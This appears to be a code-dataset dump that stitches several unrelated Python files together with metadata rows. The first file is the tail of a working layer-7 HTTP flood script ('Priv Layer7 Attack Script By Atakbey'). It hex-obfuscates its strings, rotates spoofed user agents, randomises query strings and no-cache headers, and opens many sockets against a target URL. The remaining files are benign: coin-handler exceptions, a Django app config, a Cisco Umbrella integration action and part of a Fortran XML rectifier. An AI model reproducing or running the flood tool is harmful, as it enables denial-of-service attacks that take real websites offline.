"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x34\x2E\x30\x20\x28\x63\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x3B\x20\x4D\x53\x49\x45\x20\x38\x2E\x30\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x35\x2E\x31\x3B\x20\x54\x72\x69\x64\x65\x6E\x74\x2F\x34\x2E\x30\x3B\x20\x53\x56\x31\x3B\x20\x2E\x4E\x45\x54\x20\x43\x4C\x52\x20\x32\x2E\x30\x2E\x35\x30\x37\x32\x37\x3B\x20\x49\x6E\x66\x6F\x50\x61\x74\x68\x2E\x32\x29",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x35\x2E\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x3B\x20\x55\x3B\x20\x4D\x53\x49\x45\x20\x37\x2E\x30\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x36\x2E\x30\x3B\x20\x65\x6E\x2D\x55\x53\x29",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x34\x2E\x30\x20\x28\x63\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x3B\x20\x4D\x53\x49\x45\x20\x36\x2E\x31\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x58\x50\x29",
"\x4F\x70\x65\x72\x61\x2F\x39\x2E\x38\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x35\x2E\x32\x3B\x20\x55\x3B\x20\x72\x75\x29\x20\x50\x72\x65\x73\x74\x6F\x2F\x32\x2E\x35\x2E\x32\x32\x20\x56\x65\x72\x73\x69\x6F\x6E\x2F\x31\x30\x2E\x35\x31",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x35\x2E\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x3B\x20\x55\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x35\x2E\x31\x3B\x20\x70\x6C\x3B\x20\x72\x76\x3A\x31\x2E\x38\x2E\x30\x2E\x31\x29",
"\x4A\x61\x76\x61\x2F\x31\x2E\x34\x2E\x31\x5F\x30\x34",
"\x4F\x70\x65\x72\x61\x2F\x38\x2E\x35\x31\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x35\x2E\x31\x3B\x20\x55\x3B\x20\x65\x6E\x3B\x56\x57\x50\x2D\x6F\x6E\x6C\x69\x6E\x65\x2E\x64\x65\x29",
"\x57\x67\x65\x74\x2F\x31\x2E\x39\x2E\x31",
"\x41\x70\x70\x45\x6E\x67\x69\x6E\x65\x2D\x47\x6F\x6F\x67\x6C\x65\x3B\x20\x28\x2B\x68\x74\x74\x70\x3A\x2F\x2F\x63\x6F\x64\x65\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x2F\x61\x70\x70\x65\x6E\x67\x69\x6E\x65\x3B\x20\x61\x70\x70\x69\x64\x3A\x20\x77\x65\x62\x65\x74\x72\x65\x78\x29",
"\x42\x6C\x61\x63\x6B\x42\x65\x72\x72\x79\x38\x33\x30\x30\x2F\x34\x2E\x32\x2E\x32\x20\x50\x72\x6F\x66\x69\x6C\x65\x2F\x4D\x49\x44\x50\x2D\x32\x2E\x30\x20\x43\x6F\x6E\x66\x69\x67\x75\x72\x61\x74\x69\x6F\x6E\x2F\x43\x4C\x44\x43\x2D\x31\x2E\x31\x20\x56\x65\x6E\x64\x6F\x72\x49\x44\x2F\x31\x30\x37\x20\x55\x50\x2E\x4C\x69\x6E\x6B\x2F\x36\x2E\x32\x2E\x33\x2E\x31\x35\x2E\x30",
"\x4C\x79\x6E\x78\x2F\x32\x2E\x38\x2E\x36\x72\x65\x6C\x2E\x34\x20\x6C\x69\x62\x77\x77\x77\x2D\x46\x4D\x2F\x32\x2E\x31\x34\x20\x53\x53\x4C\x2D\x4D\x4D\x2F\x31\x2E\x34\x2E\x31\x20\x4F\x70\x65\x6E\x53\x53\x4C\x2F\x30\x2E\x39\x2E\x38\x67",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x34\x2E\x30\x20\x28\x63\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x3B\x20\x4D\x53\x49\x45\x20\x36\x2E\x30\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x43\x45\x3B\x20\x49\x45\x4D\x6F\x62\x69\x6C\x65\x20\x36\x2E\x35\x29",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x35\x2E\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x31\x30\x2E\x30\x3B\x20\x57\x69\x6E\x36\x34\x3B\x20\x78\x36\x34\x29\x20\x41\x70\x70\x6C\x65\x57\x65\x62\x4B\x69\x74\x2F\x35\x33\x37\x2E\x33\x36\x20\x28\x4B\x48\x54\x4D\x4C\x2C\x20\x6C\x69\x6B\x65\x20\x47\x65\x63\x6B\x6F\x29\x20\x43\x68\x72\x6F\x6D\x65\x2F\x37\x33\x2E\x30\x2E\x33\x36\x38\x33\x2E\x31\x30\x33\x20\x53\x61\x66\x61\x72\x69\x2F\x35\x33\x37\x2E\x33\x36\x20\x4F\x50\x52\x2F\x36\x30\x2E\x30\x2E\x33\x32\x35\x35\x2E\x36\x39",
"\x4F\x70\x65\x72\x61\x2F\x39\x2E\x38\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x35\x2E\x32\x3B\x20\x55\x3B\x20\x72\x75\x29\x20\x50\x72\x65\x73\x74\x6F\x2F\x32\x2E\x35\x2E\x32\x32\x20\x56\x65\x72\x73\x69\x6F\x6E\x2F\x33\x31\x2E\x35\x31",
"\x4C\x79\x6E\x78\x2F\x32\x2E\x38\x2E\x38\x64\x65\x76\x2E\x31\x32\x20\x6C\x69\x62\x77\x77\x77\x2D\x46\x4D\x2F\x32\x2E\x31\x34\x20\x53\x53\x4C\x2D\x4D\x4D\x2F\x31\x2E\x34\x2E\x31\x20\x47\x4E\x55\x54\x4C\x53\x2F\x32\x2E\x31\x32\x2E\x31\x34",
]
def __del__(self):
self.stop()
def buildblock(self, size):
out_str = ""
_LOWERCASE = range(97, 122)
_UPPERCASE = range(65, 90)
_NUMERIC = range(48, 57)
validChars = _LOWERCASE + _UPPERCASE + _NUMERIC
for i in range(0, size):
a = random.choice(validChars)
out_str += chr(a)
return out_str
def run(self):
if DEBUG:
print "\x53\x6F\x63\x6B\x65\x74\x73\x20\x4C\x65\x72\x20\x41\x63\x69\x6C\x69\x79\x6F\x72\x2E\x2E\x2E".format(self.name)
while self.runnable:
try:
for i in range(self.nr_socks):
if self.ssl:
c = HTTPCLIENT.HTTPSConnection(self.host, self.port)
else:
c = HTTPCLIENT.HTTPConnection(self.host, self.port)
self.socks.append(c)
for conn_req in self.socks:
(url, headers) = self.createPayload()
method = random.choice([METHOD_GET, METHOD_POST]) if self.method == METHOD_RAND else self.method
conn_req.request(method.upper(), url, None, headers)
for conn_resp in self.socks:
resp = conn_resp.getresponse()
self.incCounter()
self.closeConnections()
except:
self.incFailed()
if DEBUG:
raise
else:
pass
if DEBUG:
print "\x57\x6F\x72\x6B\x65\x72\x20\x7B0\x7D\x20\x63\x6F\x6D\x70\x6C\x65\x74\x65\x64\x20\x72\x75\x6E\x2E\x20\x53\x6C\x65\x65\x70\x69\x6E\x67\x2E\x2E\x2E".format(self.name)
def closeConnections(self):
for conn in self.socks:
try:
conn.close()
except:
pass
def createPayload(self):
req_url, headers = self.generateData()
random_keys = headers.keys()
random.shuffle(random_keys)
random_headers = {}
for header_name in random_keys:
random_headers[header_name] = headers[header_name]
return (req_url, random_headers)
def generateQueryString(self, ammount = 1):
queryString = []
for i in range(ammount):
key = self.buildblock(random.randint(3,10))
value = self.buildblock(random.randint(3,20))
element = "\x7B0\x7D\x3D\x7B\x31\x7D".format(key, value)
queryString.append(element)
return "\x26".join(queryString)
def generateData(self):
returnCode = 0
param_joiner = "\x3F"
if len(self.url) == 0:
self.url = "\x2F"
if self.url.count("\x3F") > 0:
param_joiner = "\x26"
request_url = self.generateRequestUrl(param_joiner)
http_headers = self.generateRandomHeaders()
return (request_url, http_headers)
def generateRequestUrl(self, param_joiner = "\x3F"):
return self.url + param_joiner + self.generateQueryString(random.randint(1,5))
def generateRandomHeaders(self):
noCacheDirectives = ["\x6E\x6F\x2D\x63\x61\x63\x68\x65", "\x6D\x75\x73\x74\x2D\x72\x65\x76\x61\x6C\x69\x64\x61\x74\x65"]
random.shuffle(noCacheDirectives)
noCache = "\x2C\x20".join(noCacheDirectives)
acceptEncoding = ["\x27\x27","\x2A","\x69\x64\x65\x6E\x74\x69\x74\x79","\x67\x7A\x69\x70","\x64\x65\x66\x6C\x61\x74\x65"]
random.shuffle(acceptEncoding)
nrEncodings = random.randint(0,len(acceptEncoding)/2)
roundEncodings = acceptEncoding[:nrEncodings]
http_headers = {
"\x55\x73\x65\x72\x2D\x41\x67\x65\x6E\x74": random.choice(self.useragents),
"\x43\x61\x63\x68\x65\x2D\x43\x6F\x6E\x74\x72\x6F\x6C": noCache,
"\x41\x63\x63\x65\x70\x74\x2D\x45\x6E\x63\x6F\x64\x69\x6E\x67": "\x2C\x20".join(roundEncodings),
"\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E": "\x6B\x65\x65\x70\x2D\x61\x6C\x69\x76\x65",
"\x4B\x65\x65\x70\x2D\x41\x6C\x69\x76\x65": random.randint(110,120),
"\x48\x6F\x73\x74": self.host,
}
if random.randrange(2) == 0:
acceptCharset = [ "\x49\x53\x4F\x2D\x38\x38\x35\x39\x2D\x31", "\x75\x74\x66\x2D\x38", "\x57\x69\x6E\x64\x6F\x77\x73\x2D\x31\x32\x35\x31", "\x49\x53\x4F\x2D\x38\x38\x35\x39\x2D\x32", "\x49\x53\x4F\x2D\x38\x38\x35\x39\x2D\x31\x35", ]
random.shuffle(acceptCharset)
http_headers["\x41\x63\x63\x65\x70\x74\x2D\x43\x68\x61\x72\x73\x65\x74"] = "\x7B\x30\x7D\x2C\x7B\x31\x7D\x3B\x71\x3D\x7B\x32\x7D\x2C\x2A\x3B\x71\x3D\x7B\x33\x7D".format(acceptCharset[0], acceptCharset[1],round(random.random(), 1), round(random.random(), 1))
if random.randrange(2) == 0:
http_headers["\x52\x65\x66\x65\x72\x65\x72"] = random.choice(self.referers) + self.buildblock(random.randint(5,10))
if random.randrange(2) == 0:
http_headers["\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65"] = random.choice(["\x6D\x75\x6C\x74\x69\x70\x61\x72\x74\x2F\x66\x6F\x72\x6D\x2D\x64\x61\x74\x61", "\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x75\x72\x6C\x2D\x65\x6E\x63\x6F\x64\x65\x64"])
if random.randrange(2) == 0:
http_headers["\x43\x6F\x6F\x6B\x69\x65"] = self.generateQueryString(random.randint(1, 5))
return http_headers
def stop(self):
self.runnable = False
self.closeConnections()
self.terminate()
def incCounter(self):
try:
self.counter[0] += 1
except (Exception):
pass
def incFailed(self):
try:
self.counter[1] += 1
except (Exception):
pass
def usage():
print
print ""
print "Priv Layer7 Attack Script By Atakbey"
print
print ""
def error(msg):
sys.stderr.write(str(msg+"\n"))
usage()
sys.exit(2)
def main():
try:
if len(sys.argv) < 2:
error("Hedef Belirtiniz = python atak.py http://targetsite.com")
url = sys.argv[1]
if url == "\x2D\x68":
usage()
sys.exit()
if url[0:4].lower() != "\x68\x74\x74\x70":
error("\x48\x65\x64\x65\x66\x20\x55\x72\x6C\x64\x65\x20\x48\x61\x74\x61\x20\x56\x61\x72\x20\x2D\x20\x31")
if url == None:
error("\x48\x65\x64\x65\x66\x20\x55\x72\x6C\x64\x65\x20\x48\x61\x74\x61\x20\x56\x61\x72\x20\x2D\x20\x32")
opts, args = getopt.getopt(sys.argv[2:], "\x64\x68\x77\x3A\x73\x3A\x6D\x3A", ["\x64\x65\x62\x75\x67", "\x68\x65\x6C\x70", "\x77\x6F\x72\x6B\x65\x72\x73", "\x73\x6F\x63\x6B\x65\x74\x73", "\x6D\x65\x74\x68\x6F\x64" ])
workers = DEFAULT_WORKERS
socks = DEFAULT_SOCKETS
method = METHOD_GET
for o, a in opts:
if o in ("\x2D\x68\x68", "\x2D\x2D\x68\x65\x6C\x70"):
usage()
sys.exit()
elif o in ("\x2D\x73\x73", "\x2D\x2D\x73\x6F\x63\x6B\x65\x74"):
socks = int(a)
elif o in ("\x2D\x77\x77", "\x2D\x2D\x77\x6F\x72\x6B\x65\x72"):
workers = int(a)
elif o in ("\x2D\x64\x64", "\x2D\x2D\x64\x65\x62\x75\x67\x65\x64"):
global DEBUG
DEBUG = True
elif o in ("\x2D\x6D\x6D", "\x2D\x2D\x6D\x65\x74\x68\x6F\x64\x73"):
if a in (METHOD_GET, METHOD_POST, METHOD_RAND):
method = a
else:
error("\x6D\x65\x74\x68\x6F\x64\x20\x7B0\x7D\x20\x69\x73\x20\x69\x6E\x76\x61\x6C\x69\x64".format(a))
else:
error("\x6F\x70\x74\x69\x6F\x6E\x20\x27"+o+"\x27\x20\x64\x6F\x65\x73\x6E\x27\x74\x20\x65\x78\x69\x73\x74\x73")
r000t = R00T(url)
r000t.nr_workers = workers
r000t.method = method
r000t.nr_sockets = socks
r000t.fire()
except getopt.GetoptError, err:
sys.stderr.write(str(err))
usage()
sys.exit(2)
if __name__ == "\x5F\x5F\x6D\x61\x69\x6E\x5F\x5F":
main()
| 47.853392
| 611
| 0.618684
|
70048c27efd972e782d65da69997646b698672e8
| 1,435
|
py
|
Python
|
privex/coin_handlers/base/exceptions.py
|
Privex/python-coinhandlers
|
b24c0c3f7d81cedefd52a5837a371cfef2f83e97
|
[
"X11"
] | 2
|
2019-10-25T13:58:10.000Z
|
2020-02-13T16:34:05.000Z
|
privex/coin_handlers/base/exceptions.py
|
Privex/python-coinhandlers
|
b24c0c3f7d81cedefd52a5837a371cfef2f83e97
|
[
"X11"
] | null | null | null |
privex/coin_handlers/base/exceptions.py
|
Privex/python-coinhandlers
|
b24c0c3f7d81cedefd52a5837a371cfef2f83e97
|
[
"X11"
] | null | null | null |
class CoinHandlerException(Exception):
"""Base exception for all Coin handler exceptions to inherit"""
pass
class HandlerNotFound(CoinHandlerException):
"""A requested handler does not exist"""
pass
class TokenNotFound(CoinHandlerException):
"""The token/coin requested doesn't exist"""
pass
class AccountNotFound(CoinHandlerException):
"""The sending or receiving account requested doesn't exist"""
pass
class NotEnoughBalance(CoinHandlerException):
"""The sending account does not have enough balance for this operation"""
pass
class AuthorityMissing(CoinHandlerException):
"""Missing private key or other authorization for this operation"""
pass
class IssueNotSupported(CoinHandlerException):
"""This class does not support issuing, the token name cannot be issued, or other issue problems."""
pass
class IssuerKeyError(AuthorityMissing):
"""Attempted to issue tokens you don't have the issuer key for"""
pass
class DeadAPIError(CoinHandlerException):
"""A main API, e.g. a coin daemon or public node used by this coin handler is offline."""
pass
class MissingTokenMetadata(CoinHandlerException):
"""
Could not process a transaction or run the requested Loader/Manager method as required coin metadata is missing,
such as :py:attr:`payments.models.Coin.our_account` or a required key in the custom JSON settings.
"""
pass
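# Illustrative usage sketch (not part of this module; the handler class and
# helper methods below are assumptions made for the example): a coin handler
# implementation would typically raise these exceptions from its public
# methods, e.g.
#
#     class MyCoinHandler:
#         def send(self, amount, address):
#             if not self.daemon_is_reachable():
#                 raise DeadAPIError("coin daemon or public node is offline")
#             if amount > self.available_balance():
#                 raise NotEnoughBalance(f"cannot send {amount}")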
| 27.596154
| 116
| 0.738676
|
beb0d54a24bb5aa31c5ddd6adaf0d401adb67f72
| 102
|
py
|
Python
|
src/fundraising/apps.py
|
earth-emoji/love
|
3617bd47c396803c411e136b3e1de87c18e03890
|
[
"BSD-2-Clause"
] | null | null | null |
src/fundraising/apps.py
|
earth-emoji/love
|
3617bd47c396803c411e136b3e1de87c18e03890
|
[
"BSD-2-Clause"
] | 7
|
2021-03-19T10:46:09.000Z
|
2022-03-12T00:28:55.000Z
|
src/fundraising/apps.py
|
earth-emoji/love
|
3617bd47c396803c411e136b3e1de87c18e03890
|
[
"BSD-2-Clause"
] | null | null | null |
from django.apps import AppConfig
class FundraisingConfig(AppConfig):
name = 'fundraising'
| 17
| 36
| 0.735294
|
37d857b538c521d0d52bf2601e367fa120f1b39b
| 1,271
|
py
|
Python
|
plugins/cisco_umbrella_investigate/komand_cisco_umbrella_investigate/actions/samples/action.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 46
|
2019-06-05T20:47:58.000Z
|
2022-03-29T10:18:01.000Z
|
plugins/cisco_umbrella_investigate/komand_cisco_umbrella_investigate/actions/samples/action.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 386
|
2019-06-07T20:20:39.000Z
|
2022-03-30T17:35:01.000Z
|
plugins/cisco_umbrella_investigate/komand_cisco_umbrella_investigate/actions/samples/action.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 43
|
2019-07-09T14:13:58.000Z
|
2022-03-28T12:04:46.000Z
|
import komand
from .schema import SamplesInput, SamplesOutput, Input
# Custom imports below
from komand.exceptions import PluginException
class Samples(komand.Action):
def __init__(self):
super(self.__class__, self).__init__(
name="samples",
description="Return all samples associated with the domain",
input=SamplesInput(),
output=SamplesOutput(),
)
def run(self, params={}):
URL = params.get(Input.URL)
limit = params.get("limit", None)
offset = params.get("offset", None)
sortby = params.get("sortby", None)
if not limit or limit == 0:
limit = 10
if not sortby or sortby == "":
sortby = "score"
if not offset:
offset = 0
try:
samples = self.connection.investigate.samples(URL, limit=limit, offset=offset, sortby=sortby)
except Exception as e:
raise PluginException(preset=PluginException.Preset.UNKNOWN, data=e)
return samples
def test(self):
return {
"limit": 1,
"moreDataAvailable": False,
"offset": 0,
"query": "*",
"samples": [],
"totalResults": 0,
}
| 27.042553
| 105
| 0.559402
|
481722a8b6edc9b4e2364a38d91cb07ba902f886
| 226,420
|
py
|
Python
|
delphi/translators/for2py/rectify.py
|
mikiec84/delphi
|
2e517f21e76e334c7dfb14325d25879ddf26d10d
|
[
"Apache-2.0"
] | 25
|
2018-03-03T11:57:57.000Z
|
2022-01-16T21:19:54.000Z
|
delphi/translators/for2py/rectify.py
|
mikiec84/delphi
|
2e517f21e76e334c7dfb14325d25879ddf26d10d
|
[
"Apache-2.0"
] | 385
|
2018-02-21T16:52:06.000Z
|
2022-02-17T07:44:56.000Z
|
delphi/translators/for2py/rectify.py
|
mikiec84/delphi
|
2e517f21e76e334c7dfb14325d25879ddf26d10d
|
[
"Apache-2.0"
] | 19
|
2018-03-20T01:08:11.000Z
|
2021-09-29T01:04:49.000Z
|
"""
The purpose of this module is to do all the clean up for translate.py.
This (rectify.py) module contains functions that receive OFP-generated XML as input.
The functions then remove any unnecessary elements and refactor arbitrarily structured
(nested) elements into a correct structure. The output file is
approximately 30-40% smaller, in terms of number of lines, than the OFP XML.
Author: Terrence J. Lim
"""
import re
import os
import sys
import argparse
import json
import xml.etree.ElementTree as ET
import copy
from delphi.translators.for2py import For2PyError, syntax, f2grfn
from os.path import isfile, join
from typing import List, Tuple
TYPE_MAP = {
"int": "integer",
"bool": "logical",
}
class RectifiedXMLGenerator:
def __init__(self):
# True if derived type declaration exist
self.is_derived_type = False
# True if derived type var. reference exist
self.is_derived_type_ref = False
# True if current var. is an array
self.is_array = False
# True if format exists in the code
self.is_format = False
# True if current var. is for function argument
self.is_function_arg = False
# True only if goto-stmt exists in the AST
self.need_goto_elimination = False
# True if more goto-stmt exists
self.continue_elimination = False
# True if operation negation is needed
self.need_op_negation = False
# True if any statement requires reconstruction
self.need_reconstruct = False
# True if each goto case is ready for reconstruction
self.reconstruct_after_case_now = False
self.reconstruct_before_case_now = False
# True if each goto case encountered
self.label_before = False
self.label_after = False
# True if statement nests stop statement
self.is_stop = False
# True if statements follow either after
# goto or label. Both cannot be true
# at the same time
self.collect_stmts_after_goto = False
self.collect_stmts_after_label = False
# True if collecting of statement is done
self.collecting_stmts_done = False
# True if reconstruction (goto elimination) is done
self.reconstruction_for_after_done = False
self.reconstruction_for_before_done = False
# True if one reconstructed statement needs another
# reconstruction by nesting it under do while due to
# label_before case exist as it's parent goto
self.encapsulate_under_do_while = False
# Keep a track where goto was declared
# whether it's under program(main) or loop body
self.goto_under_loop = False
# Keeps track of the signed real/int literal constant inside data
# statements
self.is_data_stmt_constant = False
# Keeps records of encountered <goto-stmt> lbl value
self.goto_target_lbl_after = []
self.goto_target_lbl_before = []
# Keeps records of encountered <label> lbl value
self.label_lbl_for_before = []
self.label_lbl_for_after = []
# A name mapper list for declared
# 'label_flag_' variables
self.declared_label_flags = []
self.declared_goto_flags = []
# A list to hold save_entity tags
self.saved_entities = []
# Keep a track of all encountered goto and label stmts
self.encountered_goto_label = []
# Keep a track of goto and label with its case
self.goto_label_with_case = {}
# Keeps a track of current label of goto-stmt
self.current_label = None
# Keep a track of operations for conditional goto
# key will be the unique code assigned to each <goto-stmt>
# {code:Element}
self.conditional_op = {}
# Counts the number of <goto-stmt> in the code
self.goto_stmt_counter = 0
# Keep a track of collected goto-stmts and labels
# for goto elimination and reconstruction
self.stmts_after_goto = {
'goto-stmts': [],
'labels': [],
}
# Dictionary to hold statements before_after case
self.statements_to_reconstruct_before = {
"stmts-follow-label": [],
"count-gotos": 0,
}
# Dictionary to hold statements label_after case
self.statements_to_reconstruct_after = {
"stmts-follow-goto": [],
"stmts-follow-label": [],
"count-gotos": 0,
}
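        # Illustration of the two cases (example Fortran, not from the source):
        #     GOTO 100  ...  100 CONTINUE   -> label appears *after* the goto
        #     100 CONTINUE  ...  GOTO 100   -> label appears *before* the goto
        # The two dictionaries above collect the statements to be moved or
        # removed for each of these cases during goto elimination.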
# Keeps a track of current derived type name
self.cur_derived_type_name = None
# Keeps a track of current scope of code
# i.e. program, main, or function, etc.
self.current_scope = None
# Keep a track of both array and non-array variables
# in the dictionary of {'name' : 'scope'}
self.declared_non_array_vars = {}
self.declared_array_vars = {}
# Keep a track of declared derived type variables
self.derived_type_var_holder_list = []
        # Holds variables extracted from a derived type reference,
        # i.e. for x%y%z, the variables x, y, and z
self.derived_type_refs = []
# Keeps track of subscripts of arrays
self.subscripts_holder = []
# Holds format XML for later reconstruction
self.format_holder = []
# Holds a type of parent element's type element
self.parent_type = ET.Element('')
# Holds XML of derived type reference for later reconstruction
self.derived_type_ref = ET.Element('')
# Actually holds XML of current scope
self.current_body_scope = ET.Element('')
# Keeps a track of parent statements to goto-stmt
self.goto_stmt_parents = []
# Keeps a track of parent statements to label
self.label_parents = []
# Flag to check if the variable is a character
self.is_character = False
# List to store all the character variables defined
self.character_var_list = []
# Keeps a track of the main body that the statement
# is nested under, i.e. program, loop, and if, etc
self.body_level = {
"current": None,
"prev": None,
"grand-prev": None,
}
self.body_level_rank = {
"program": 1,
"loop": 2,
"if": 2
}
self.body_elem_holder = {
"program": None,
"loop": None,
"if": None,
}
        # Checks whether the current <goto-stmt> is
        # conditional or not.
self.conditional_goto = False
# True if goto handling needs outward or
# inward movement.
self.outward_move = False
self.inward_move = False
        # True if another <if> appears before
        # goto. This <if> has nothing to do with
        # the conditional status of the goto.
self.if_appear_before_goto = True
# True if goto is under <if> that is
# a conditional goto statement.
self.goto_under_if = False
# If goto is conditional and under else
# that is a case of conditional without operator
self.goto_under_else = False
        # When handling a function, collect its argument names
self.args_for_function = []
# Holds arguments of subroutine or function XML object
self.arguments_list = {}
# Holds function argument types
self.argument_types = {}
# Temporarily holds the type of declaring variable type
self.variable_type = None
# Holds the caller arguments that are array
self.caller_arr_arguments = {}
# Set to true if handling <call>
self.call_function = False
self.original_fortran_file_abs_path = None
self.module_log_file_path = None
self.module_files_to_process = []
self.modules_in_file = []
self.derived_type_array_dimensions = {}
self.dim = 0
# Keeps a track of maximum number of function
# arguments that are member of interface
self.member_function_argument_max = 0
# Mark whether currently handling interface
# member functions
self.is_interface_member = False
# Keeps a track of interface function names
self.interface_functions = {}
self.interface_function_xml = {}
        # Mark whether currently handling interface
self.is_interface = False
# Keep a track of currently declaring interface name
self.cur_interface_name = None
# Keep a track of interface XML object for later update
self.interface_xml = {}
self.dimensions_holder = None
# Keep a dictionary of declared variables {"var_name":"type"}
# by their scope
self.variables_by_scope = {}
# Keep a track of used module in the current program
self.used_modules = []
# Holds module summary imported from modFileLog.json file
self.module_summary = {}
#################################################################
# #
# TAG LISTS FOR EACH HANDLER #
# #
#################################################################
file_child_tags = [
"program",
"subroutine",
"module",
"declaration",
"function",
"prefix"
]
program_child_tags = [
"header",
"body"
]
statement_child_tags = [
"assignment",
"write",
"format",
"stop",
"execution-part",
"print",
"open",
"read",
"close",
"call",
"statement",
"label",
"literal",
"continue-stmt",
"do-term-action-stmt",
"return",
"contains-stmt",
"declaration",
"prefix",
"function",
"internal-subprogram",
"internal-subprogram-part",
"prefix",
"exit",
"cycle",
]
loop_child_tags = [
"header",
"body",
"format"
]
specification_child_tags = [
"declaration",
"use",
]
declaration_child_tags = [
"type",
"dimensions",
"variables",
"format",
"name",
"type-declaration-stmt",
"prefix-spec",
"save-stmt",
"saved-entity",
"access-spec",
"attr-spec",
"access-stmt",
"access-id-list",
"constants",
"interface",
"subroutine",
"intent",
"names",
"procedure-stmt",
"literal",
"values"
]
value_child_tags = [
"literal",
"operation",
"name",
]
derived_type_child_tags = [
"declaration-type-spec",
"type-param-or-comp-def-stmt-list",
"component-decl-list__begin",
"component-initialization",
"data-component-def-stmt",
"component-def-stmt",
"component-attr-spec-list",
"component-attr-spec-list__begin",
"explicit-shape-spec-list__begin",
"explicit-shape-spec",
"explicit-shape-spec-list",
"component-attr-spec",
"component-attr-spec-list__begin",
"component-shape-spec-list__begin",
"explicit-shape-spec-list__begin",
"explicit-shape-spec",
"component-attr-spec",
"component-attr-spec-list",
"end-type-stmt",
"derived-type-def",
]
header_child_tags = [
"index-variable",
"operation",
"arguments",
"names",
"name",
"loop-control",
"label",
"literal",
"equiv-operand__equiv-op",
"subroutine-stmt",
"value-ranges",
]
body_child_tags = [
"specification",
"statement",
"loop",
"if",
"label",
"stop",
"do-term-action-stmt",
"select",
"case",
]
operand_child_tags = [
"name",
"literal",
"operation",
]
subscripts_child_tags = [
"name",
"literal",
"operation",
"argument",
"range",
]
index_range_child_tags = [
"lower-bound",
"upper-bound",
"step",
]
bound_child_tags = [
"literal",
"name",
"operation",
]
module_child_tags = [
"header",
"body",
"module-stmt",
"members",
"end-module-stmt",
"contains-stmt",
]
members_child_tags = [
"subroutine",
"module-subprogram",
"module-subprogram-part",
"declaration",
"prefix",
"function",
]
only_child_tags = [
"name",
"only",
"only-list",
]
select_child_tags = [
"header",
"body",
]
case_child_tags = [
"header",
"body",
]
unnecessary_tags = [
"do-variable",
"end-program-stmt",
"main-program",
"char-selector",
"declaration-type-spec",
"type-param-or-comp-def-stmt-list",
"component-decl-list__begin",
"data-component-def-stmt",
"component-def-stmt",
"component-initialization",
"attr-spec",
"attr-id",
"designator",
"int-literal-constant",
"char-literal-constant",
"real-literal-constant",
"io-control-spec",
"array-spec-element",
"print-stmt",
"print-format",
"keyword-argument",
"end-subroutine-stmt",
"logical-literal-constant",
"equiv-op",
"equiv-operand",
"saved-entity-list__begin",
"saved-entity-list",
"access-id",
"parameter-stmt",
"type-param-value",
"char-selector",
"interface-block",
"interface-stmt",
"interface-body",
"interface-specification",
"end-interface-stmt",
"select-case-stmt",
"case-selector",
"case-stmt",
"end-select-stmt",
"component-attr-spec-list__begin",
"explicit-shape-spec-list__begin",
"explicit-shape-spec",
"explicit-shape-spec-list",
"component-attr-spec",
"component-attr-spec-list",
"sequence-stmt",
"private-or-sequence",
"data-stmt-set",
"data-stmt",
"signed-real-literal-constant",
"signed-int-literal-constant",
"data-stmt-constant",
"data-i-do-object-list__begin",
]
output_child_tags = [
"name",
"literal",
"operation",
]
dtype_var_declaration_tags = [
"component-decl",
"component-decl-list",
"component-decl-list__begin",
]
variable_child_tags = [
"initial-value",
"length",
"dimensions",
]
#################################################################
# #
# HANDLER FUNCTIONS #
# #
#################################################################
def handle_tag_file(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the file elements.
        In order to control new sub-element creation under
        the current element, a check of the form child.tag == "__tag_name__"
        has been added. If any new tag that is not currently being
        handled appears in the future, add
        child.tag == "__tag_name__" at the end of the last
        condition. This applies to all other handler functions as well.
<file>
</file>
"""
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
try:
_ = self.file_child_tags.index(child.tag)
            except ValueError:
assert (
False
), f'In handle_tag_file: "{child.tag}" not handled'
if len(child) > 0 or child.text:
self.parseXMLTree(child, cur_elem, current, parent, traverse)
def handle_tag_program(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML
elements between the program elements.
<program>
</program>
"""
self.current_scope = root.attrib['name']
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag in self.program_child_tags:
if child.tag == "body":
self.current_body_scope = cur_elem
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_program: "{child.tag}" not handled'
def handle_tag_header(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the header elements.
<header>
</header>
"""
